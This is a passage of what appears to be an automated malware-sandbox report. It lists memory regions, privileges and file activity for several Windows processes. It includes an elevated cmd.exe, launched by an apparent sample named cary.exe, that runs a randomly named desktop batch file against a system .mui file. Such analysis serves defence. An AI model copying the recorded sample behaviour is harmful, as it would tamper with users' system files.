| userdatatypehelperutil.dll | 0x7ff8e1050000 | 0x7ff8e1060fff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ff8e1650000 | 0x7ff8e165bfff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ff8e1940000 | 0x7ff8e1c21fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostclient.dll | 0x7ff8e2fe0000 | 0x7ff8e2feffff | Memory Mapped File | rwx |
|
|
|
- |
| idstore.dll | 0x7ff8e3040000 | 0x7ff8e3066fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ff8e3c30000 | 0x7ff8e3fa5fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ff8e5dd0000 | 0x7ff8e5ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x7ff8e7400000 | 0x7ff8e741bfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ff8e7430000 | 0x7ff8e7560fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ff8e84e0000 | 0x7ff8e84f7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ff8ea550000 | 0x7ff8ea55afff | Memory Mapped File | rwx |
|
|
|
- |
| msv1_0.dll | 0x7ff8ea560000 | 0x7ff8ea5befff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptdll.dll | 0x7ff8ea770000 | 0x7ff8ea783fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #106: sppsvc.exe
5
0
| Information | Value |
|---|---|
| ID | #106 |
| File Name | c:\windows\system32\sppsvc.exe |
| Command Line | C:\Windows\system32\sppsvc.exe |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd68 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF0
0x
CD4
0x
CFC
0x
CEC
0x
CD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000000f8fe80000 | 0xf8fe80000 | 0xf8fe86fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000f8fe90000 | 0xf8fe90000 | 0xf8fe9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000f8fea0000 | 0xf8fea0000 | 0xf8feb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000f8fec0000 | 0xf8fec0000 | 0xf8ff3ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf8ff40000 | 0xf8fffdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000f90000000 | 0xf90000000 | 0xf9007ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f90080000 | 0xf90080000 | 0xf90086fff | Private Memory | rw |
|
|
|
- |
| sppsvc.exe.mui | 0xf90090000 | 0xf90095fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000f900a0000 | 0xf900a0000 | 0xf900a0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f900b0000 | 0xf900b0000 | 0xf900b0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f900c0000 | 0xf900c0000 | 0xf900cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f900d0000 | 0xf900d0000 | 0xf900dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f900f0000 | 0xf900f0000 | 0xf901effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f90260000 | 0xf90260000 | 0xf9026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000f90270000 | 0xf90270000 | 0xf903f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000f90400000 | 0xf90400000 | 0xf90580fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000f90590000 | 0xf90590000 | 0xf9064ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000f90650000 | 0xf90650000 | 0xf906cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f906d0000 | 0xf906d0000 | 0xf907cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000f907d0000 | 0xf907d0000 | 0xf9084ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xf90850000 | 0xf90b86fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000f90b90000 | 0xf90b90000 | 0xf90c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffd20000 | 0x7df5ffd20000 | 0x7ff5ffd1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff78e600000 | 0x7ff78e600000 | 0x7ff78e6fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff78e700000 | 0x7ff78e700000 | 0x7ff78e722fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff78e725000 | 0x7ff78e725000 | 0x7ff78e726fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78e727000 | 0x7ff78e727000 | 0x7ff78e728fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78e729000 | 0x7ff78e729000 | 0x7ff78e729fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78e72a000 | 0x7ff78e72a000 | 0x7ff78e72bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78e72c000 | 0x7ff78e72c000 | 0x7ff78e72dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78e72e000 | 0x7ff78e72e000 | 0x7ff78e72ffff | Private Memory | rw |
|
|
|
- |
| sppsvc.exe | 0x7ff78ed00000 | 0x7ff78f32dfff | Memory Mapped File | rwx |
|
|
|
- |
| clipc.dll | 0x7ff8d5560000 | 0x7ff8d5575fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptxml.dll | 0x7ff8d5580000 | 0x7ff8d55a1fff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ff8d5a50000 | 0x7ff8d5bcafff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ff8eadb0000 | 0x7ff8eadc0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ff8eafb0000 | 0x7ff8eb170fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\spp\store\2.0\data.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\System32\spp\store\2.0\data.dat.bak | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\spp\store\2.0\data.dat.tmp | type = file_attributes |
|
2 |
Process #107: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #107 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb10 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CF4
0x
90C
0x
4E0
0x
BCC
0x
F4
0x
BD4
0x
250
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000b27a5b0000 | 0xb27a5b0000 | 0xb27a5bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000b27a5c0000 | 0xb27a5c0000 | 0xb27a5c6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27a5d0000 | 0xb27a5d0000 | 0xb27a5e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27a5f0000 | 0xb27a5f0000 | 0xb27a6effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27a6f0000 | 0xb27a6f0000 | 0xb27a6f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27a700000 | 0xb27a700000 | 0xb27a701fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27a710000 | 0xb27a710000 | 0xb27a710fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27a720000 | 0xb27a720000 | 0xb27a726fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27a730000 | 0xb27a730000 | 0xb27a82ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xb27a830000 | 0xb27a8edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b27a8f0000 | 0xb27a8f0000 | 0xb27a9effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27a9f0000 | 0xb27a9f0000 | 0xb27a9f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27aa00000 | 0xb27aa00000 | 0xb27aafffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27ab00000 | 0xb27ab00000 | 0xb27ab00fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27ab10000 | 0xb27ab10000 | 0xb27ab10fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27ab20000 | 0xb27ab20000 | 0xb27ab22fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b27ab40000 | 0xb27ab40000 | 0xb27ab41fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27abc0000 | 0xb27abc0000 | 0xb27abcffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xb27abd0000 | 0xb27af06fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b27af10000 | 0xb27af10000 | 0xb27b00ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27b010000 | 0xb27b010000 | 0xb27b10ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27b110000 | 0xb27b110000 | 0xb27b20ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b27b210000 | 0xb27b210000 | 0xb27b397fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b27b3a0000 | 0xb27b3a0000 | 0xb27b520fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b27b530000 | 0xb27b530000 | 0xb27c92ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b27c930000 | 0xb27c930000 | 0xb27ca2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b27caa0000 | 0xb27caa0000 | 0xb27caaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff2c0000 | 0x7df5ff2c0000 | 0x7ff5ff2bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6a460c000 | 0x7ff6a460c000 | 0x7ff6a460dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a460e000 | 0x7ff6a460e000 | 0x7ff6a460ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6a4610000 | 0x7ff6a4610000 | 0x7ff6a470ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6a4710000 | 0x7ff6a4710000 | 0x7ff6a4732fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6a4734000 | 0x7ff6a4734000 | 0x7ff6a4735fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4736000 | 0x7ff6a4736000 | 0x7ff6a4737fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a4738000 | 0x7ff6a4738000 | 0x7ff6a4739fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a473a000 | 0x7ff6a473a000 | 0x7ff6a473afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a473c000 | 0x7ff6a473c000 | 0x7ff6a473dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a473e000 | 0x7ff6a473e000 | 0x7ff6a473ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff6a4de0000 | 0x7ff6a4de6fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ff8dd900000 | 0x7ff8dd94afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e57b0000 | 0x7ff8e5a23fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ff8e9680000 | 0x7ff8e9715fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #108: backgroundtaskhost.exe
0
0
| Information | Value |
|---|---|
| ID | #108 |
| File Name | c:\windows\system32\backgroundtaskhost.exe |
| Command Line | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:01:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x32c |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
134
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000f2b96a0000 | 0xf2b96a0000 | 0xf2b96bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f2b96c0000 | 0xf2b96c0000 | 0xf2b96d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f2b96e0000 | 0xf2b96e0000 | 0xf2b975ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f2b9760000 | 0xf2b9760000 | 0xf2b9763fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f2b9770000 | 0xf2b9770000 | 0xf2b9771fff | Private Memory | rw |
|
|
|
- |
| s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep | 0xf2b9780000 | 0xf2b9780fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff200000 | 0x7df5ff200000 | 0x7ff5ff1fffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff655bd0000 | 0x7ff655bd0000 | 0x7ff655bf2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff655bfc000 | 0x7ff655bfc000 | 0x7ff655bfcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655bfe000 | 0x7ff655bfe000 | 0x7ff655bfffff | Private Memory | rw |
|
|
|
- |
| backgroundtaskhost.exe | 0x7ff6560e0000 | 0x7ff6560e6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #109: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #109 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:18, Reason: Child Process |
| Unmonitor | End Time: 00:03:13, Reason: Self Terminated |
| Monitor Duration | 00:00:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb1c |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
864
0x
14C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007d0000 | 0x007d0000 | 0x007effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x007f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x007f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00813fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00863fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x00870fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x00881fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04a80000 | 0x04b3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004be0000 | 0x04be0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04e3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e40000 | 0x05176fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec30000 | 0x7ec30000 | 0x7ed2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed30000 | 0x7ed30000 | 0x7ed52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed57000 | 0x7ed57000 | 0x7ed57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed59000 | 0x7ed59000 | 0x7ed5bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed5c000 | 0x7ed5c000 | 0x7ed5cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed5d000 | 0x7ed5d000 | 0x7ed5ffff | Private Memory | rw |
|
|
|
- |
